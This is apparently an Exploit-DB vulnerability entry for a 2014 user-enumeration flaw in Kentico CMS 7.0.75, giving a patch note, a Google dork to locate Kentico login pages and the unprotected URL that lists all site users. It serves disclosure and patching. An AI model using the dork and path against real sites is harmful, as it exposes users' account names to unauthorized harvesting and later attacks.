Kentico CMS User Enumeration Bug

vendor:

Kentico CMS

by:

Charlie Campbell and Lyndon Mendoza

7,5

CVSS

HIGH

User Enumeration

200

CWE

Product Name: Kentico CMS

Affected Version From: 7.0.75

Affected Version To: 7.0.75

Patch Exists: YES

Related CWE: N/A

CPE: a:kentico_software:kentico_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

Kentico CMS User Enumeration Bug

This vulnerability is an unprotected page on the site where you can view all current users and usernames. To find out if a Kentico CMS is vulnerable go to http://site.com/CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx assuming that the Kentico CMS was installed to the root folder in the server.

Mitigation:

Patch the vulnerable version of Kentico CMS

Source

Exploit-DB raw data:

# Exploit Title: Kentico CMS User Enumeration Bug
# Google Dork: inurl:/CMSPages/logon.aspx <-- enumerates several Kentico
CMS sites
# Date: 02-25-2014
# Exploit Author: Charlie Campbell and Lyndon Mendoza
# Vendor Homepage: http://www.kentico.com/
# Software Link: http://www.kentico.com/Download-Demo/Trial-Version
# Version: [Version 7.0.75 and previous versions]

This vulnerability is an unprotected page on the site where you can view
all current users and usernames.
To find out if a Kentico CMS is vulnerable go to

http://site.com/CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx

assuming that the Kentico CMS was installed to the root folder in the
server.

I have already notified the authors and security team for Kentico CMS, in
their response they claimed they would issue a patch on 02-21-2014.